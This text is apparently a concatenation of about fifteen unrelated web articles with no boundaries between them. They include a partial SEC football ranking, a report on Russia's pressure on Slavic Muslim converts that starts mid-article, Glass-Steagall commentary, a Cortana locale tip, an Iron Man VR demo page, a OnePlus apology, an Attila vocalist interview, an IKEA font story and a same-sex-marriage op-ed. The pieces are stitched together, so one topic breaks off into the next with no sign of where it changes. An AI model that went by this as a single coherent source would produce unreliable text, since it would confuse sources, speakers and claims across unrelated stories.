6. LSU- It seems like the Tigers perhaps should be higher after rallying from 24-7 down to top Wisconsin, 28-24, in Houston, but it's tough to rank them ahead of the five in front of them. And what if the Badgers had had any passing game to speak of? Kenny Hilliard, who was the forgotten man among the Tigers' running backs heading into this season- and the veteran saved the day with 110 yards on 18 carries and the game-winning touchdown.
7. Ole Miss- Just like LSU, it feels like the Rebels should be higher (good grief the SEC West is a bloodbath this year!) because they were impressive, particularly on defense, in a 35-13 win against Boise State at the Georgia Dome on Thursday night. If quarterback Bo Wallace can play like he played in the second half (four touchdown passes) for the entire season, then Ole Miss is going to win a lot of games. Its defense is stout as many of the young, talented players on that side of the ball from the 2013 recruiting class are coming into their own.
8. Tennessee- Speaking of young players coming into their own, Butch Jones had his inexperienced team ready to play on Sunday night as the Vols rolled over Utah State, 38-7, in Knoxville. Quarterback Justin Worley (who seemed more mobile Sunday night than he has in the past) was efficient, hitting 27-of-38 passes for 273 yards and three touchdowns. The Vols defense was a bigger story, holding the Aggies to 244 yards of total offense. This team has a tough schedule, but the talent is there to surprise.
9. South Carolina- The Gamecocks were the preseason media pick to win the SEC East and probably are better than they showed on Thursday night. Still, this isn't just a case of a team not showing up in a game or being overconfident. If you watched, even in the second half South Carolina's players on offense were playing with effort and toughness to try to get back in the game. This was a situation where the talent was lacking to stop a talented offensive football team on defense. If the Gamecocks can improve on that side, they certainly can get back on track.
10. Florida- It's tough to rank Florida any higher than No. 10 because the Gators' game with Idaho was cancelled. We will know more next week.
11. Kentucky- Granted, it was Tennessee-Martin, but there were some signs that the Wildcats are improved, particularly on offense, during their 59-14 victory. Quarterback Patrick Towles definitely can throw the ball (377 yards and a touchdown), but he also has some wheels- averaging 10 yards per carry. UK also has depth at running back- Braylon Heard, Mikel Horton, Stanley Williams, Josh Clemons and JoJo Kemp all are experienced and have talent.â€¨â€¨
12. Arkansas- If the Razorbacks were in the SEC East, they could make a bowl and perhaps finish in the top three of the division. In the first half, they gave Auburn all it wanted, forcing a 21-21 tie before fading in the second. This is still a young team, but it's a young team with a chance this year, particularly on offense. The jury is out on the defense, but quite honestly a lot of teams are going to give up big numbers to Auburn this year.
13. Missouri- The Tigers pulled away from FCS foe South Dakota State in the second half behind Russell Hansbrough and Maty Mauk. While a win is a win, some of the concerns on both sides of the ball heading into this season were evident. Missouri has a few games to tune up before conference play and should move back up.
14. Vanderbilt- There isn't much you can say after a 37-7, turnover-plagued home loss to Temple to open the season and the era of first-year head coach Derek Mason. There's nowhere to go but up. Ole Miss comes to town this week and that game will be a measuring stick of week-to-week improvement.
Russia's security services, however, were not about to let that happen.
An aggressive crackdown that began before last year's Winter Olympics in Sochi never ended, leading to widespread arrests not just in the predominantly Muslim Caucasus but throughout European Russia and as far north as Novy Urengoi, just below the Arctic Circle, where the authorities this year demolished a building that had housed a mosque and an Islamic preschool.
The pressure by the security services, in the name of combating extremism, has set off a wave of refugees seeking safety and religious freedom, especially in Turkey and the United Arab Emirates.
Muslim leaders and human rights advocates say that Russia's often brutal approach has also added to the appeal of the Islamic State, with the Russian authorities saying recently that hundreds of Russian Muslims have gone to Syria.
For moderate converts who have fled Russia, one obstacle to obtaining political asylum, or even more basic social service help, has been a lack of awareness among some officials that Slavic Muslims even exist.
“Lawyers who were to speak about our problem with the authorities, they said that the first thing to do was to explain to the Turkish government that there is a group of ethnic Russian Muslims, because no one has the slightest idea of this,” said Dmitri I. Chernomorchenko, who was born to Christian parents in Cherkessk in the North Caucasus, but took the name Khamza when he converted and now lives in Istanbul.
“We know Tatars, Chechens; we know that Dagestanis of various ethnicities are killed, but that there are suppressed Russians and that you actually have a large ethnic group, we don't know about this,” Mr. Chernomorchenko said, explaining the reaction he faced when he moved to Turkey.
The aggressive scrutiny by the Russian security services on converts to Islam are based partly on a belief, shared by some experts on religious fundamentalism, that they are more likely to embrace extremism and carry out terrorist attacks.
UFC Star Nick Diaz COP TROUBLE But He Wasn't Arrested
UFC Fighter Nick Diaz -- Cop Trouble ... But He WASN'T Arrested
EXCLUSIVE
UFC starsure made everyone THINK he was thrown in jail this weekend when he posted a pic of himself in front of a cop car, but TMZ has learned he was NOT actually arrested.Diaz posted the pic with the caption "F**k they got us" ... leading many to believe he was referencing a recent prediction he made -- that he will end up in jail because he's never paid taxes in his life.Seriously, Diaz said ... out loud ... that he's never paid a single cent in taxes -- EVER.Turns out Diaz did have a run in with cops Sunday night -- but only because he was a passenger in a car that was pulled over for going the wrong way down a one way street.from the Citrus Heights PD tells TMZ the driver of the car was arrested on an outstanding warrant and another passenger in the car was arrested for possession of concentrated cannabis ... but Diaz "was never arrested and was released without incidents from the scene."Diaz has since removed the pic from his Twitter page and if his claims about being a tax evader are true, it seems like he dodged a major bullet ... at least for now.
Ten years ago to the day, the government reversed one of the key elements of the Depression-era banking laws, knocking down the firewall between commercial banks, which take deposits and make loans, and investment banks, which underwrite securities. The repeal of the Glass-Steagall Act of 1933 was seen at the time as a way to help American banks grow larger and better compete on the world stage.
“Today, Congress voted to update the rules that have governed financial services since the Great Depression and replace them with a system for the 21st century,” then-Treasury Secretary Lawrence H. Summers said at the time. “This historic legislation will better enable American companies to compete in the new economy.”
But 10 years later, the end of Glass-Steagall has been blamed by some for many of the problems that led to last fall's financial crisis. While the majority of problems that occurred centered mostly on the pure-play investment banks like Lehman Brothers, the huge banks born out of the revocation of Glass-Steagall, especially Citigroup, and the insurance companies that were allowed to deal in securities, like the American International Group, would not have run into trouble had the law still been in place.
“Commercial banks played a crucial role as buyers and sellers of mortgage-backed securities, credit-default swaps and other explosive financial derivatives,” Demos, a nonpartisan public policy and research organization, wrote in a report discussing the problems it said were caused by the repeal of Glass-Steagall.
“Without the watering down and ultimate repeal of Glass-Steagall, the banks would have been barred from most of these activities,” Demos said. “The market and appetite for derivatives would then have been far smaller, and Washington might not have felt a need to rescue the institutional victims.”
But 10 years ago, the revocation of Glass-Steagall drew few critics. In the House, 155 Democrats and 207 Republicans voted for the measure, while 51 Democrats, 5 Republicans and 1 independent opposed it. Fifteen members did not vote.
One of the leading voices of dissent was Senator Byron L. Dorgan, Democrat of North Dakota. He warned that reversing Glass-Steagall and implementing the Republican-backed Gramm-Leach-Bliley Act was a mistake whose repercussions would be felt in the future.
“I think we will look back in 10 years' time and say we should not have done this, but we did because we forgot the lessons of the past, and that that which is true in the 1930s is true in 2010,” Mr. Dorgan said 10 years ago. “We have now decided in the name of modernization to forget the lessons of the past, of safety and of soundness.”
Mr. Dorgan still feels the same way. “I thought reversing Glass-Steagall would set us up for dramatic failure and that is exactly what has happened,” the senator told DealBook on Thursday. “To fuse together the investment banking function with the F.D.I.C. banking function has proven to be a profound mistake.”
Senator Richard Shelby of Alabama, now the ranking Republican on the Senate Banking Committee, was the only Republican in the Senate to oppose the repeal of Glass-Steagall, his office noted on Thursday afternoon.
Mr. Shelby voted against the Gramm-Leach-Bliley Act because of his concern that repealing Glass-Steagall would threaten the safety and soundness of the banking system, his office said, adding that he did not believe that the changes that the act made on the regulatory side were sufficient to keep pace with changes made on the industry side.
Mr. Dorgan's views about the repeal of Glass-Steagall were echoed by then-Senator Barack Obama in 2008 as he campaigned for president.
“By the time the Glass-Steagall Act was repealed in 1999, the $300 million lobbying effort that drove deregulation was more about facilitating mergers than creating an efficient regulatory framework,” Mr. Obama said in a speech on the economy at Cooper Union in New York in March 2008. “Instead of establishing a 21st century regulatory framework, we simply dismantled the old one,” thereby encouraging “a winner take all, anything goes environment that helped foster devastating dislocations in our economy.”
Today, President Obama seems to have softened his views a bit when it comes to Glass-Steagall. The administration's proposal for overhauling financial regulatory system makes no mention of resurrecting the firewall between commercial banks and investment banks and still allows insurance companies to deal in securities. The change of heart may have something to do with the fact that one of his senior economic advisers is Mr. Summers.
There seems to be no real push to reinstate Glass-Steagall in either of the pending versions of the financial overhaul bill being considered by the House Financial Services Committee and the Senate Banking Committee.
But the Senate version of the bill introduced this week by Senator Christopher J. Dodd, the Connecticut Democrat who is chairman of the Senate Banking Committee, did go further than the House bill. Mr. Dodd's bill called for the various banking regulators set up in the 1930s, which had separate jurisdictions based in part on the firewall divisions created by Glass-Steagall, to finally be merged into one new agency. The aim is that a single regulator would discourage regulator shopping by financial institutions and lead to better oversight of banks.
In a way, the merging of the various agencies finally strips away the last vestiges of Glass-Steagall. But many analysts believe that it is impossible to go back to the days when commercial and investment banking were completely separated. Instead, lawmakers hope that stricter oversight will help banks avoid the troubles that led to the financial crisis. We may need to wait another 10 years to find out if that is truly the case.
— Cyrus Sanati
Go to 1999 Article from The New York Times »
Go to Report from Demos (pdf) »
Go to 2008 Economic Speech from Barack Obama via The New York Times »
Go to Related Item from DealBook »
For those of you who live outside the United States and have downloaded the January Technical Preview of Windows 10, you may have noticed that Cortana, one of the biggest new features present in the build, will not work for you, at least not officially.
Gabe Aul has recently confirmed on Twitter that Cortana will officially come in other regions and languages in future preview builds, but we may have found a way for you to test it right now, although it is limited to using English when communicating with the digital personal assistant.
To get it working, all you have to do is change Region and Language settings. To do this, go to the desktop control panel, and select "Clock, Language, and Region" from the right hand side. Then click on Region, and change the following:
In the "Formats" tab, set format as English (United States)
In the "Location" tab, set Home Location as United States
In the "Administrative" tab, set Current System Locale to English (United States)
Also make sure that English (United States) is set as your primary display language, otherwise none of the above changes will work. If you don't have it installed go to "Add a Language" and choose it from the list. Then set as primary.
Restart your PC, and when you click Cortana, she'll be happy to assist you. You need to sign in with your Microsoft account, and tell her what you'd like her to call you. Once you're done, use the microphone or keyboard to interact, and you can also enable "Hey Cortana" by following our guide here.
To make life easier for non-native speakers who wish to speak to Cortana, there's a setting that compensates a bit for phonetic differences in pronunciation. To activate it go in the Settings app, choose System -> Speech -> set Speech language as English (U.S.), then tick the box that says "Use speech patterns for non native speakers of this language".
MK1.5 Hellicarrier Update is here!
This is my first VR project and I am using it strictly as a learning experience (Not For Sale) before I begin other projects. I've always wanted to recreate the house from the movies and thought this would be a great opportunity to learn about VR development too.
Intro:
Explore the famous Malibu Pointe mansion as Iron Man in Virtual Reality. Epic vistas, real-time lighting effects and every 10 minutes a new day begins! More features to come…
Controls:
Standard keyboard controls, WASD to walk, mouse to supplement turning. Xbox 360 Controller support included. Press “H” key on keyboard to “Hide your Helmet” for clear vision.
Future Development:
While this is a learning experience I do plan to try and at least achieve a few major milestones. Here's a list of some of the key features and plans I have in mind so far for future updates: * Character Animations * Flying * J.A.R.V.I.S. * H.U.D. Animations Any feedback would be appreciated, I've only been learning/developing this a few weeks so any tips etc. from other developers welcome! I hope you enjoy some of the the views as much as I have. Requirements: WINDOWS 64BIT ONLY for now. OSX version coming soon. I recommended running the demo at the highest resolution (ie 1920 x 1080) and adjusting the graphics settings until you have a fairly smooth experience. MK1.4 UPDATE** -The House is now completely baked for better fps performance -Atmospheric rescaling and lighting optimizations – Major draw call reduction across all quality settings Disclaimer: [ This is non-commercial, and is never to be sold. This is meant for learning and educational purposes only. ]
Download Links
WINDOWS 64Bit Dropbox: https://dl.dropboxusercontent.com/u/12419667/Iron_Man_MK1.5.zip Mega: https://mega.co.nz/#!lJphkTwa!ouz4F8Lx__ZPJRt7amv_PWCIHXGgKoUBQCp3aR3kkjI Mac 64Bit (Experimental) Dropbox: https://dl.dropboxusercontent.com/u/12419667/Iron_Man_MK1.3_MAC.zip Mega: https://mega.co.nz/#!AZQ2zZRL!XWHEUUUt80JcQQFWMXMtOm8IXwk8PT_NswnXfPzZu6k Linux 64Bit (Experimental) Dropbox: https://dl.dropboxusercontent.com/u/12419667/Iron_Man_MK1.3_LINUX.zip Mega: https://mega.co.nz/#!4BI0HQ7Y!cy_Y5bOjKUH-l-xxuyuzsQlOAxsWdNpzPSuxb9M8SnA [ This is non-commercial, and is never to be sold. This is meant for learning and educational purposes only. ]
COLORADO SPRINGS, Colo. -- Garden of the Gods is one of the most picturesque and well-known locations in all of Colorado. It also was the scene of an attack on Wednesday night by an assailant in a clown mask.
Police confirmed a person was assaulted by a person wearing a clown mask on Wednesday night on Garden of the Gods Road just before 8 p.m.
Reports show the attack victim and his wife walked along a bike path when two men, one wearing a clown mask, approached.
In the reports, police say the victim's wife explained her husband first asked who the two were, including the man in the mask. Neither replied.
The victim then took a preemptive strike, hitting the masked clown, who attacked him back.
According to the Colorado Springs Gazette, the victim suffered a deep cut to his head and had to have stitches on his ear.
Police said the victim, who first responders rushed to a local hospital, did not cooperate with hospital staff. They say he became aggressive.
Officers are investigating, but have not released any additional details.
--------- Sign up for Denver7 email alerts to stay informed about breaking news and daily headlines.
Or, keep up-to-date on the latest news and weather with the Denver7 apps for iPhone/iPads , Android and Kindle .
We messed up the launch of the OnePlus 2.Well, we messed up the launch of the OnePlus One as well. Although inventory levels ramped up eventually, months after the announcement, it was still extremely difficult to buy the device. We comforted ourselves to the fact that we were young, and that we'd learn and show the world we could do better next time around.With the OnePlus 2, we made rosy plans. We were more confident, and prepared a lot more inventory. We told our users it would be 30-50x easier to get invites, and they needn't worry. Yet, we only began shipping in meaningful quantities this week, nearly a month after our initial targeted shipping date. You can talk all you want, but in the end, flawless execution speaks much louder than unfulfilled promises.I'd like to apologize on behalf of OnePlus for the delay To our fans, sorry. We were equally excited when we saw your excitement around the OnePlus 2. We know how it feels waiting and waiting for something you really want, while being given ETAs that go unfulfilled. We appreciate the trust and support that you have given to a relatively small and unknown company like OnePlus. We know that you are rooting for us, and want nothing more than to see us succeed. Therefore, it feels extra terrible to let you down this time around, again.To our partners, sorry. We know how hard it is to run a business, and admire the way you've built your companies to operate efficiently and smartly. We know how much planning and coordination is involved in a launch like this, and that it can take some time to learn how to work with our young and scrappy, but inexperienced team. We like to think that what we lack in experience can be made up for in hard work and invested hours, but this time that was not the case. We never want to cause unnecessary complications in your operations and appreciate you helping us learn and grow.To our team, sorry. This delay has brought huge opportunity cost upon our OnePlus. It has shortened the product life cycle of the OnePlus 2, as well as caused huge reputational damage to our company. Although we don't think competition will impact us much, it's still undeniable that we've given a month to competing products to catch up. In addition, it has put a dent on our strong forward momentum and made it harder for us to reach our full business potential as a company.Truth is, hardware is extremely hard. There are so many things to consider, like cash flow, inventory, supply chain and production. Every step of the way, there are landmines for the uninitiated and uncareful. This is a reflection and not an excuse.In fact, there are very few excuses in this world that are valid. We simply messed up again and apologize for that. We don't plan on making further promises for future launches, and will instead focus on showing the world how we've improved through our actions.Over the past few days, we've been discussing how we can make it up to our fans for the delay. One of the best ideas we have is to open sales up for an hour sometime later this month or early next, to make the entire process a bit more painless for would-be OnePlus 2 users. We will need to look into production and operations to determine when this is most feasible. We'll keep you posted.As we start to really ramp up the shipping of OnePlus 2, we look forward to all (don't be afraid of being harsh with us) product feedback. Help us improve.
WASHINGTON — President Barack Obama will meet at the White House Wednesday with the Dalai Lama in a get-together the Chinese government assailed.
Obama had been scheduled to travel to Wisconsin to appear at a campaign event with presumptive Democratic presidential nominee Hillary Clinton. But the event was postponed after Sunday's shooting at an Orlando, Florida, nightclub that left 50 people dead, including the gunman.
That created a hole in Obama's schedule, and the White House filled it with the Tibetan spiritual leader.
China's Foreign Ministry said in response that it had made “solemn representations” to the U.S. Embassy in Beijing and expressed its “firm opposition” over the meeting.
“We need to emphasize that the Tibetan issue is China's internal affairs and other countries do not have any right to interfere with this,” spokesman Lu Kang told a daily media briefing.
“The 14th Dalai Lama is not simply a religious figure but a political figure in exile who has been conducting secessionist activities internationally under the pretext of religion,” the statement said. “If President Obama meets with Dalai Lama, it will send the wrong signal to Tibetan separatist forces, and it will undermine the mutual trust and cooperation between China and the U.S.”
Lu urged Washington to “stick by its promise of recognizing Tibet as part of China, and not support Tibetan independence or any separatist activities.”
Beijing accuses the Dalai Lama, the Tibetan Buddhists' spiritual leader, of campaigning to split Tibet from the rest of China, but he says he simply wants a higher degree of autonomy under Chinese rule.
Beijing also blames him and others for inciting a wave of self-immolations among Tibetans in recent years. Dozens have set themselves on fire while calling for the return of the Dalai Lama or for Tibetan independence.
The White House has barred news media coverage of the meeting and the meeting will be held in the Map Room instead of the Oval Office, which is reserved for visiting heads of state.
Credit: Facebook
Whether or not you're part of a controversial band that is known for polarising opinions, attracting lovers or haters and very few listeners that sit in the middle, being a versatile vocalist is essential in sticking out. Fronz (or Fronzilla, or even Christopher Fronzak) of Attila is definitely a frontman who has a few cards up his sleeves, one of which being his unique and spur of the moment creation: rap screams.
Soon to be dropping their sixth full-length record ‘Chaos', one which the band have gone on record of being their most diverse and versatile, Fronz has also aimed to present how he's stepped up his game on the vocal front. So, we had a little word with the guy to talk about why he got into doing vocals, how he works on improving his vocal work, how to avoid and heal vocal damage, and more.
INSPIRATION AND STARTING OUT:
My original inspiration for becoming a vocalist was the lack of creativity & originality within heavy music when I started out 13 years ago. At the time heavy vocalists all sounded the same, they were very monotone and used the same vocal patterns over and over. I set out as a vocalist to break down barriers, I wanted to make my voice sound like 5 vocalists in one and use unique patterns and think outside the box.
I never originally planned to be a vocalist. When I was about 12 I tried out every single instrument and I sucked ass at everything. Through process of elimination, the only thing I was left with was vocals. Eventually, when I was 13, I met some older high school kids that offered me to ‘scream' in their band. I'd never done it before, but I committed and told them I could do it. I grabbed the microphone and tried it out, and I didn't suck. Well… I wasn't good at first, but I didn't suck.
FAVOURITE VOCALISTS:
Lil Jon was always a big favourite. I like the aggression in his rap. He's basically yelling. I said “Hey, if Lil Jon can yell in his rap then I can too!” I love 2 Chainz for his tone and his verses. The shit he says is so clever.
Out of vocalists in our music scene, I like Tyler Carter (Issues/ex-Woe, Is Me). He's been a close friend of mine for a really long time. One vocalist I always loved growing up was the vocalist of The Warriors (Marshall Lichtenwaldt). ‘War Is Hell' is one of my favourite albums. I love how he sounds like he's screaming so hard that his throat is bleeding. I also recommend Dan Watson (Enterprise Earth/ex-Infant Annihilator).
Credit: Liz Ramanand
VOCAL STYLES:
If I had to choose a favourite, I would say that it's a tie between guttural low vocals or clean singing. Guttural lows just feel badass as fuck, they feel so good live. It's just pure evil. I like clean singing because it's hard. It's a challenge for me, and challenge is what fuels me. If I didn't constantly challenge myself I'd probably just keel over and die.
THE BIRTH OF THE RAP SCREAM:
I started doing my crazy fast rap screams one day when I was completely tweaked out on coffee. I was about 16 years old and worked at Starbucks. Coffee was free, so I took advantage and drank way more coffee than I should have. I got super jacked on espresso and wrote the beginning of ‘Soda In the Water Cup' on the back of a receipt. Later that day at practice, I grabbed the microphone and started spitting rapid fire scream vocals, and the entire band was in shock. Their jaws dropped, and the rest is history. It kind of became my signature vocal style.
BEGINNER'S ADVICE:
Practice singing/screaming in your car or in your room while you blast your stereo on full volume. Keep experimenting and singing along to all different types of songs until you find something that suits your voice, and then build yourself up from there. Don't over-exert yourself in the beginning. Start with easier songs that have more simple vocals and then progress from there.
Don't get discouraged if you can't reach a certain tone or pitch, or if you aren't an amazing vocalist at first. Experiment with different techniques until you find a tone that works for you. Every voice is different. Focus on what your voice is the strongest at and then expand from there. You will always get better with time. I've been singing for 13 years now, and I still learn more every year. Practice, practice, practice.
WARMING UP:
Vocal warm-ups are vital. I usually do between 15-30 minutes of warm-ups before every performance or recording session. I find that warm-ups are more vital for me during the beginning of a tour versus the end of a tour. This might just be a personal thing, but my voice always feels extremely strong once I'm a week or two into a tour.
Credit: Sandra-Chen
MELISSA CROSS AND ‘THE ZEN OF SCREAMING' DVDS:
I personally use the Melissa Cross ‘Zen Of Screaming' warm-ups. I don't do the entire procedure, I just pick out the bits and pieces that feel the best for my voice. I haven't had any one-on-one lessons with her, but I think her lessons are great.
AVOIDING DAMAGE & RECOVERING:
Your throat/mouth is just used for sculpting the tone, not for pushing out the tone. Try to push your vocals from the gut, from your diaphragm. If you're hurting your voice, you aren't doing it right.
After a show, practice, or recording session, get lots of sleep, water, hydration, and warm tea. Don't drink anything bubbly. If you're old enough to drink alcohol, Honey Jack Daniel's works wonders. It coats your throat and gives you a good buzz. If you don't drink, Throat Coat is great if you need that extra edge. It keeps your voice sounding full and juicy.
It sounds rude, but don't talk too much. Make sure you're sleeping at least a solid 8 hours per night. Literally, the only thing that heals your vocal chords is sleep. I've literally been on tour with bands where their singer couldn't sing any of his parts because he partied all night and refused to sleep. Sleep is key.
FINAL WORDS:
As a vocalist, I am the most proud of my performance on our new album, ‘Chaos'. This is the most vocally diverse album I've ever written, and I know that you guys will think the same.
Credit: Promo
Attila‘s new full-length album, ‘Chaos' is set for release on November 4th 2016 through SharpTone Records.
You can pre-order the album online now from the band's official website (here), iTunes (here), Amazon (here), and Google Play (here).
Are you in a band? Do you own a label or PR company? Want to share your experience and tips with others aspiring to do the same thing? Get in touch with our features editor, Mike Heath (email or Twitter), and we can share your tricks of the trade.
Written by Zach Redrup (@zachredrup)
in collaboration with Maratona dles Dolomites Enel eFondoin collaboration with Zwift
WHEN?
December 31st 2018 at 9:00 AM (CET)
There is no pre-registration and no lottery to enter.
WHERE?
Watopia Island on Zwift
HOW?
Classic or smart trainers connected on Zwift
PRIZES?
All entrants that finish the race will unlock the official Maratona dles Dolomites - Enel Castelli
cycling jersey for all future rides on Zwift.
THAT'S NOT ALL! We're also giving away 2 starting places at the 33rd edition of the
Maratona dles Dolomites-Enel!
If the winner already has a starting place at this years event, then we can offer 2 options:
Upgrade to start in the 1st wave of riders
The possibility to use the 2 entries for the 2020 edition
OTHER PRIZES?
We don't stop at the two free entries - we will draw more prizes for all entrants that finish the
first edition of the eFondo including:
1 Official Castelli Cycling kit: Premio Bibshort + Volata Jersey
2 KOO Maratona dles Dolomites limited edition sunglasses
Follow the updates about the event on zwift.com
National Gallery Asian art review finds 22 items have insufficient or questionable record of ownership
Updated
More than 20 items in the National Gallery of Australia's Asian art collection have "insufficient" or "questionable" provenance documentation, a review by former High Court Justice Susan Crennan has found.
Key points: The NGA announced last year it would investigate the ownership history of 54 items in its collection
14 objects were bought from disgraced New York art dealer Subhash Kapoor
Last year the NGA announced it would investigate the ownership history of 54 items in its collection as part of efforts to review the provenance and legal status of works.
In September 2014, the so-called Dancing Shiva, a 900-year-old bronze statue from the gallery's collection, was returned to India because it was believed to be stolen from a temple.
The NGA bought the statue for $5 million in 2008 from disgraced New York art dealer Subhash Kapoor, who was arrested in 2011 and is awaiting trial in India on charges of conspiracy to commit theft.
Buddha statue returned to India
Former prime minister Tony Abbott returned the Shiva statue to his Indian counterpart, Narendra Modi.
A 2,000-year-old stone statue of Buddha will also be returned to India later this year.
The seated stone Buddha was purchased for the NGA in 2007 by Roslyn Packer, the widow of the late Kerry Packer.
Last year the NGA announced they would receive a refund of more than $1.2 million for the statue.
The NGA maintains it has been a victim of fraud.
Today, the gallery said in a statement the independent review of 36 objects had revealed 22 had "insufficient" or "questionable" documentation, including 14 purchased from Mr Kapoor.
Ms Crennan's audit found 12 objects had satisfactory provenance documentation and two other objects required further research.
Los Angeles-based investigative journalist Jason Felch runs the blog Chasing Aphrodite, which has uncovered instances of stolen art being bought by galleries around the world.
He said when thorough research was done, the claims of provenance often came apart.
"While it's often difficult to find all the answers, what this report underscores is if you ask the right questions and have the right scepticism, you can often indentify those objects that are problematic before you buy them," he said.
Objects to be returned where possible: NGA director
The National Gallery and the High Commission of India have welcomed the report's release.
NGA director Gerard Vaughan said the gallery flagged to the review the sculptures they were most concerned about.
"So there are no real surprises but what we have now is clarification as to where we stand," he said.
"From our perspective it's a really positive step forward ... because what former justice Crennan has concluded is the processes we put in place to work through every one of the 5,000 items in our Asian collection are good processes."
Dr Vaughan said where objects were found to be clearly stolen they would be returned to the country of origin.
"Other objects, it may be through agreement, because we will never know when they left India or what the circumstances were," he said.
"Other objects we may find that they'll stay here with the approval of the Government of India.
"It's a regrettable situation, but it's a common one."
'They know stuff is stolen'
India's High Commissioner to Australia Navdeep Suri said the review was a step in the right direction.
"To really establish whether an object is stolen you need to have a police report established in India, and it's a pretty complex job to try to match that information with the exact objects that are here," he said.
"I compliment the NGA for the approach it's taken, because frankly there are a number of other countries and institutions, they know that stuff if stolen, but they're not even willing to countenance the restitution to the rightful owners."
Mr Suri said it was important to ensure objects were acquired legally as they were part of India's cultural heritage.
"Sometimes items that have been stolen from a temple or a place of worship also have the additional spiritual significance associated with them," he said.
"Unless other arrangements are worked out they are best located where they came from."
Topics: library-museum-and-gallery, art-history, canberra-2600, act
First posted
Image copyright BrewDog Image caption The grant will lead to 130 new jobs at BrewDog's facility in Ellon, Aberdeenshire
Aberdeenshire-based drinks firm BrewDog is to create 130 new jobs in response to demand for their craft beer.
The move follows an announcement by the Scottish government that the company has been awarded £1.5m in Regional Selective Assistance (RSA).
BrewDog said the grant would result in investment of more than £20m in the company.
The expansion will see the firm increase its workforce at Ellon from 370 to 500.
The company, which was founded eight years ago in Fraserburgh by James Watt and Martin Dickie, has been growing quickly in recent years.
It was named by The Sunday Times Fast Track 100 as the fastest growing food and drink company in the UK.
'Success story'
During a visit to BrewDog's Ellon facility, Deputy First Minister John Swinney said: "BrewDog is a remarkable Scottish success story, beginning with Martin and James' passion for quality craft beer in 2007 and growing into a major award-winning company.
"I am delighted to support this growth through today's RSA award which will create a further 130 jobs in the north east."
BrewDog's turnover this year is expected to top £32m. In addition to brewing, it owns more than two dozen bars, the majority of which are based in the UK.
IKEA says goodbye to Futura
After 50 years of the iconic Futura typeface, IKEA has made a switch to… Verdana?
The 2010 IKEA catalog, now arriving at doorsteps around the world, reveals the company's choice to change all typography to the Microsoft font that every web designer has grown to hate (you can already hear the cries). Verdana, specifically designed for on-screen readability, first shipped with Internet Explorer 3 in 1996. Being one of the better looking ‘Core fonts for the web'—a limited selection which also includes Arial, Comic Sans, and Times New Roman—Verdana has become one of the most widely used fonts on the web (but rarely ever used in print).
The font will replace IKEA Sans (a customized version of Futura by Robin Nicholas), and IKEA Serif (based on Century Schoolbook). In an interview with the Swedish design magazine Cap & Design, IKEA's Ivana Hrdlickova says the main reason for the switch was to allow the company to use the same typeface in all countries (current IKEA typefaces do not contain Asian characters, for example). Being that Verdana was designed for the web, it also allows the company's image to remain consistent online and in print.
Before
After
The 2010 edition of the world's third most printed publication (next to the Bible and Harry Potter), is now available online. For more on Futura, check out Know your type: Futura.
via Typophile
UPDATE: People are passionate about IKEA's typography, Verdana has made it to Twitter's trending topics and there is already an online petition to replace it (Aug 26, 2009).
The Verdana controversy has been picked up by Business Week and Brand New, even the mainstream media (Time and Associated Press) is talking about it. IKEA spokeswoman Camilla Meiby responds to AP (Aug 31, 2009):
We're surprised, but I think it's mainly experts who have expressed their views, people who are interested in fonts. I don't think the broad public is that interested.
Verdana is a simple, cost-effective font which works well in all media and languages.
More mainstream coverage in the Saturday edition of the New York Times, mentions idsgn and reader comments (Sep 5, 2009).
There's something inexorable about cultural momentum; it doesn't gather easily, but when it does, it's difficult to stop. The decision today to legalize same-sex marriage did not happen suddenly or by accident; it's the result of a decades-long battle. But it signals what most of us have long known: the country has changed.
Politics reflects culture, not the other way around. Once public opinion began to shift on LGBT rights, it was a matter of time before the courts and the law followed suit – such is the nature of democracy. The GOP, however, has yet to accept this new reality; they've yet to notice that the culture war is over – and they lost.
Advertisement:
As soon as the Supreme Court announced their decision, Republicans resisted. Mike Huckabee said: “I will not acquiesce to an imperial court any more than our Founders acquiesced to an imperial British monarch. We must reject judicial tyranny, not retreat.” The always-deplorable Bobby Jindal also took an immediate and tone-deaf stand against equality: "Marriage between a man and a woman was established by God, and no earthly court can alter that." Republican Attorney General of Texas, Ken Paxton, similarly vowed to fight the ruling, denouncing it as an attack on freedom and “religious liberty.” In the coming days, other prominent Republicans will likely speak out as well. They'll tell us how corrosive today's decision was. They'll tell us how decadent the country's become, how unmoored from traditional values it is. And, in every instance, they'll be wrong.
The GOP's opposition to marriage equality is telling for a number of reasons. First, it demonstrates how out of step with popular culture the party really is. History has sprinted right by them and they're too invested in the past to catch up. And that's because they've cornered themselves. Republicans decided years ago, as a matter of strategy, to embrace their right-wing base. As a consequence, the culture war has become central to their platform; they can't escape it no matter how costly it becomes.
To be a Republican today is to inherit a political burden: It's simply not possible to be a viable GOP candidate without selling out to the religious right. From abortion to drug law reform to contraception to same-sex marriage, Republicans are unable to cede to majority opinion; their base won't let them. The hysterical reactions we've seen today – and will doubtless see more of in the presidential election – make that painfully clear.
In many ways, this is the result of a deeply cynical Republican strategy to win the presidential election in 2004. To secure Bush's reelection, the GOP made gay marriage a defining issue. They organized ballot initiatives in 11 states (two of which, Ohio and Michigan, were vital swing states) banning same-sex marriage. The chief goal, however, was not to actually ban gay marriage; it was to boost Republican turnout for the presidential election by galvanizing social conservatives. Karl Rove's gambit worked: Bush won. But the victory came at a high cost. The Republicans have since been the anti-gay party. This puts them at odds with most of the country, particularly young Americans. It now puts them on the wrong side of the law as well.
Republicans are unlikely to correct course on this issue. They'll do what they always do when the law or the people reject their agenda: They'll double down on the original mistake. Rather than face reality and tell their base the truth it doesn't want to hear (that they're fighting a lost struggle), Republicans will continue to toss meat at the culture warriors hijacking their party. And that's a damn shame.
This ought to be a celebration. The right to love and to marry is elemental – it belongs to everyone. No institution is as fundamental to love and family and commitment as marriage. If it's true – as Republicans insist – that marriage is good for the family and for society more generally, then how is growing the institution a bad thing? There's nothing positive about marriage that can't be preserved or enhanced by allowing more human beings to participate in it.
Advertisement:
Perhaps the great irony of this debate is that Republicans fail to see how strong a conservative case there is to be made in defense of same-sex marriage. Allowing gay people to marry does not impede the rights of straight people to do the same; nor does it diminish the sacredness of the institution. In fact, according to the logic of social conservatism, expanding marriage can only lead to more stability, more structure, more love, more virtue, and more moderation. If conservative weren't blinded by bigotry, they'd recognize this, and they'd applaud today's decision.
The good news, though, is that the country doesn't need their approval. Today happened. Marriage equality is the law of the land. And that's a good thing – for everyone.
